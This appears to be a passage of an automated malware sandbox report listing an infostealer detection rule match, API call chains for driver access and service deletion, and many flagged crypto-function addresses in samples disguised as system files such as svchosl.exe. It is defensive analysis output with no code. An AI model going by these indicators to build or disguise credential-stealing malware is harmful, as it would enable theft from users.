Source: 00000000.00000002.3275621443.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Contains functionality to communicate with device drivers
Source: C:\Users\123.exe Code function: 3_2_00EB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 3_2_00EB6FAA
Contains functionality to delete services
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_00000001400133A0 _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 6_2_00000001400133A0
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408C60 0_2_00408C60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC11 0_2_0040DC11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407C3F 0_2_00407C3F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418CCC 0_2_00418CCC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CA0 0_2_00406CA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004028B0 0_2_004028B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A4BE 0_2_0041A4BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418244 0_2_00418244
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401650 0_2_00401650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402F20 0_2_00402F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004193C4 0_2_004193C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418788 0_2_00418788
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402F89 0_2_00402F89
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402B90 0_2_00402B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004073A0 0_2_004073A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E2B17 0_2_029E2B17
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E18B7 0_2_029E18B7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E786D 0_2_029E786D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E3187 0_2_029E3187
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E31F0 0_2_029E31F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029F89EF 0_2_029F89EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E7EA6 0_2_029E7EA6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E8EC7 0_2_029E8EC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029EDE78 0_2_029EDE78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E77D9 0_2_029E77D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E6F07 0_2_029E6F07
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029F8F33 0_2_029F8F33
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029FA725 0_2_029FA725
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029F84AB 0_2_029F84AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E2DF7 0_2_029E2DF7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_044A7740 0_2_044A7740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_044A7733 0_2_044A7733
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C49318 0_2_07C49318
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C48A10 0_2_07C48A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C42924 0_2_07C42924
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4F7F8 0_2_07C4F7F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4A5D8 0_2_07C4A5D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4967A 0_2_07C4967A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4A5C7 0_2_07C4A5C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4A5D8 0_2_07C4A5D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C41438 0_2_07C41438
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C49309 0_2_07C49309
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C43FD2 0_2_07C43FD2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C41E69 0_2_07C41E69
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C41E78 0_2_07C41E78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4FC55 0_2_07C4FC55
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C48A02 0_2_07C48A02
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4F808 0_2_07C4F808
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C61299 0_2_07C61299
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C6EAA8 0_2_07C6EAA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C6DF88 0_2_07C6DF88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07D3BB91 0_2_07D3BB91
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07D30040 0_2_07D30040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07D30007 0_2_07D30007
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E2C58 0_2_084E2C58
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E3190 0_2_084E3190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E11A8 0_2_084E11A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E8218 0_2_084E8218
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084EC8F8 0_2_084EC8F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E34C3 0_2_084E34C3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08514931 0_2_08514931
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085141E0 0_2_085141E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0851D770 0_2_0851D770
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08517B55 0_2_08517B55
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08518158 0_2_08518158
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08515570 0_2_08515570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08576D00 0_2_08576D00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08571F5C 0_2_08571F5C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08578CF4 0_2_08578CF4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08571F5C 0_2_08571F5C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08571F5C 0_2_08571F5C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085B70B8 0_2_085B70B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085BA968 0_2_085BA968
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085BCAFA 0_2_085BCAFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085BBCEE 0_2_085BBCEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085B9540 0_2_085B9540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085B9530 0_2_085B9530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085BBDB0 0_2_085BBDB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08600040 0_2_08600040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08600006 0_2_08600006
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_089898F8 0_2_089898F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_089861D0 0_2_089861D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08984A98 0_2_08984A98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08987268 0_2_08987268
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08983BB8 0_2_08983BB8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_089813C0 0_2_089813C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08984330 0_2_08984330
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08985B31 0_2_08985B31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0898DD99 0_2_0898DD99
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08980590 0_2_08980590
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0898BE98 0_2_0898BE98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0898EEF8 0_2_0898EEF8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08988F90 0_2_08988F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08987FD8 0_2_08987FD8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08983740 0_2_08983740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_089898E9 0_2_089898E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08980040 0_2_08980040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08983BA8 0_2_08983BA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08987FC8 0_2_08987FC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09427940 0_2_09427940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09423E38 0_2_09423E38
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0898A0C0 0_2_0898A0C0
Source: C:\Users\123.exe Code function: 3_2_00EB848E 3_2_00EB848E
Source: C:\Users\123.exe Code function: 3_2_00EC6CDC 3_2_00EC6CDC
Source: C:\Users\123.exe Code function: 3_2_00EB40FE 3_2_00EB40FE
Source: C:\Users\123.exe Code function: 3_2_00EC00B7 3_2_00EC00B7
Source: C:\Users\123.exe Code function: 3_2_00EC4088 3_2_00EC4088
Source: C:\Users\123.exe Code function: 3_2_00ED51C9 3_2_00ED51C9
Source: C:\Users\123.exe Code function: 3_2_00EC7153 3_2_00EC7153
Source: C:\Users\123.exe Code function: 3_2_00EB32F7 3_2_00EB32F7
Source: C:\Users\123.exe Code function: 3_2_00EC62CA 3_2_00EC62CA
Source: C:\Users\123.exe Code function: 3_2_00EC43BF 3_2_00EC43BF
Source: C:\Users\123.exe Code function: 3_2_00EBF461 3_2_00EBF461
Source: C:\Users\123.exe Code function: 3_2_00EDD440 3_2_00EDD440
Source: C:\Users\123.exe Code function: 3_2_00EBC426 3_2_00EBC426
Source: C:\Users\123.exe Code function: 3_2_00EC77EF 3_2_00EC77EF
Source: C:\Users\123.exe Code function: 3_2_00EDD8EE 3_2_00EDD8EE
Source: C:\Users\123.exe Code function: 3_2_00EB286B 3_2_00EB286B
Source: C:\Users\123.exe Code function: 3_2_00EE19F4 3_2_00EE19F4
Source: C:\Users\123.exe Code function: 3_2_00EBE9B7 3_2_00EBE9B7
Source: C:\Users\123.exe Code function: 3_2_00EC3E0B 3_2_00EC3E0B
Source: C:\Users\123.exe Code function: 3_2_00EBEFE2 3_2_00EBEFE2
Source: C:\Users\123.exe Code function: 3_2_00ED4F9A 3_2_00ED4F9A
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140020A2C 6_2_0000000140020A2C
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000D2D0 6_2_000000014000D2D0
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140023864 6_2_0000000140023864
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140010470 6_2_0000000140010470
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_00000001400070A0 6_2_00000001400070A0
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140019CB4 6_2_0000000140019CB4
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_00000001400030D0 6_2_00000001400030D0
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000F500 6_2_000000014000F500
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140013D10 6_2_0000000140013D10
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140005D20 6_2_0000000140005D20
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000DD40 6_2_000000014000DD40
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140012550 6_2_0000000140012550
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140022D60 6_2_0000000140022D60
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014001CDD4 6_2_000000014001CDD4
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140012E00 6_2_0000000140012E00
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140008E20 6_2_0000000140008E20
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000EE50 6_2_000000014000EE50
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140021B40 6_2_0000000140021B40
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140002B50 6_2_0000000140002B50
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014001ABAC 6_2_000000014001ABAC
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014001DBB8 6_2_000000014001DBB8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B346A4C 14_2_00007FF77B346A4C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3406D4 14_2_00007FF77B3406D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B327C70 14_2_00007FF77B327C70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B346500 14_2_00007FF77B346500
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B337C98 14_2_00007FF77B337C98
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B338350 14_2_00007FF77B338350
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B335B50 14_2_00007FF77B335B50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3303D8 14_2_00007FF77B3303D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B33E3B8 14_2_00007FF77B33E3B8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32FBB8 14_2_00007FF77B32FBB8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B332A28 14_2_00007FF77B332A28
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3406D4 14_2_00007FF77B3406D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3332F0 14_2_00007FF77B3332F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B345B00 14_2_00007FF77B345B00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B339AA0 14_2_00007FF77B339AA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3312C0 14_2_00007FF77B3312C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32911D 14_2_00007FF77B32911D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B343A10 14_2_00007FF77B343A10
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3301CC 14_2_00007FF77B3301CC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3288EB 14_2_00007FF77B3288EB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B33D8A4 14_2_00007FF77B33D8A4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32874B 14_2_00007FF77B32874B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B349808 14_2_00007FF77B349808
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32FFC8 14_2_00007FF77B32FFC8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B331658 14_2_00007FF77B331658
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B341674 14_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B332E2C 14_2_00007FF77B332E2C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B343EAC 14_2_00007FF77B343EAC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B345D7C 14_2_00007FF77B345D7C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B33DD38 14_2_00007FF77B33DD38
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3305DC 14_2_00007FF77B3305DC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3325F0 14_2_00007FF77B3325F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32FDBC 14_2_00007FF77B32FDBC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B346A4C 16_2_00007FF77B346A4C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32874B 16_2_00007FF77B32874B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B327C70 16_2_00007FF77B327C70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B346500 16_2_00007FF77B346500
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B337C98 16_2_00007FF77B337C98
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B338350 16_2_00007FF77B338350
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B335B50 16_2_00007FF77B335B50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3303D8 16_2_00007FF77B3303D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B33E3B8 16_2_00007FF77B33E3B8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32FBB8 16_2_00007FF77B32FBB8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B332A28 16_2_00007FF77B332A28
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3406D4 16_2_00007FF77B3406D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3332F0 16_2_00007FF77B3332F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B345B00 16_2_00007FF77B345B00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B339AA0 16_2_00007FF77B339AA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3312C0 16_2_00007FF77B3312C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32911D 16_2_00007FF77B32911D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B343A10 16_2_00007FF77B343A10
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3301CC 16_2_00007FF77B3301CC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3288EB 16_2_00007FF77B3288EB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B33D8A4 16_2_00007FF77B33D8A4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B349808 16_2_00007FF77B349808
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32FFC8 16_2_00007FF77B32FFC8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B331658 16_2_00007FF77B331658
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B341674 16_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B332E2C 16_2_00007FF77B332E2C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B343EAC 16_2_00007FF77B343EAC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3406D4 16_2_00007FF77B3406D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B345D7C 16_2_00007FF77B345D7C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B33DD38 16_2_00007FF77B33DD38
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3305DC 16_2_00007FF77B3305DC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3325F0 16_2_00007FF77B3325F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32FDBC 16_2_00007FF77B32FDBC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1EB0 16_2_00007FF8A87C1EB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1AE1 16_2_00007FF8A87C1AE1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1F73 16_2_00007FF8A87C1F73
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A895A910 16_2_00007FF8A895A910
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2112 16_2_00007FF8A87C2112
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C69F6 16_2_00007FF8A87C69F6
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5204 16_2_00007FF8A87C5204
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C60D7 16_2_00007FF8A87C60D7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6717 16_2_00007FF8A87C6717
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C12A8 16_2_00007FF8A87C12A8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3EA4 16_2_00007FF8A87C3EA4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88FEDB0 16_2_00007FF8A88FEDB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1BC7 16_2_00007FF8A87C1BC7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88EEE80 16_2_00007FF8A88EEE80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DEF00 16_2_00007FF8A87DEF00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C60DC 16_2_00007FF8A87C60DC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C51D7 16_2_00007FF8A87C51D7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C34AE 16_2_00007FF8A87C34AE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3EB3 16_2_00007FF8A87C3EB3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2671 16_2_00007FF8A87C2671
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DF060 16_2_00007FF8A87DF060
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4421 16_2_00007FF8A87C4421
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3099 16_2_00007FF8A87C3099
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2D60 16_2_00007FF8A87C2D60
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C24AA 16_2_00007FF8A87C24AA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6915 16_2_00007FF8A87C6915
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4DA4 16_2_00007FF8A87C4DA4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88A2410 16_2_00007FF8A88A2410
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C2B2B 16_2_00007FF8A87C2B2B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C654B 16_2_00007FF8A87C654B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6000 16_2_00007FF8A87C6000
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C258B 16_2_00007FF8A87C258B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4E7B 16_2_00007FF8A87C4E7B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88F6710 16_2_00007FF8A88F6710
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4129 16_2_00007FF8A87C4129
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C105F 16_2_00007FF8A87C105F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C6596 16_2_00007FF8A87C6596
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C19D8 16_2_00007FF8A87C19D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88AA870 16_2_00007FF8A88AA870
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4B24 16_2_00007FF8A87C4B24
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C3C1A 16_2_00007FF8A87C3C1A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A895BA70 16_2_00007FF8A895BA70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A89F3B80 16_2_00007FF8A89F3B80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4025 16_2_00007FF8A87C4025
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A882FB00 16_2_00007FF8A882FB00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C385F 16_2_00007FF8A87C385F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C12C1 16_2_00007FF8A87C12C1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88FFB70 16_2_00007FF8A88FFB70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C1B95 16_2_00007FF8A87C1B95
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DBD60 16_2_00007FF8A87DBD60
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C200E 16_2_00007FF8A87C200E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A8957E70 16_2_00007FF8A8957E70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C513C 16_2_00007FF8A87C513C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A896FF80 16_2_00007FF8A896FF80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A88EBFA0 16_2_00007FF8A88EBFA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C7194 16_2_00007FF8A87C7194
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87DBF20 16_2_00007FF8A87DBF20
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C135C 16_2_00007FF8A87C135C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C627B 16_2_00007FF8A87C627B
